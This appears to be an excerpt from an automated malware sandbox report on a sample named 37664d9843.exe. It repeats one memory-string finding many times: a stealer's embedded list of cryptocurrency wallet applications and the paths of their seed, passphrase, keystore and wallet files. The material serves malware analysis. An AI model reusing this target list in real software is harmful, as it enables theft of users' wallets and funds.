                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
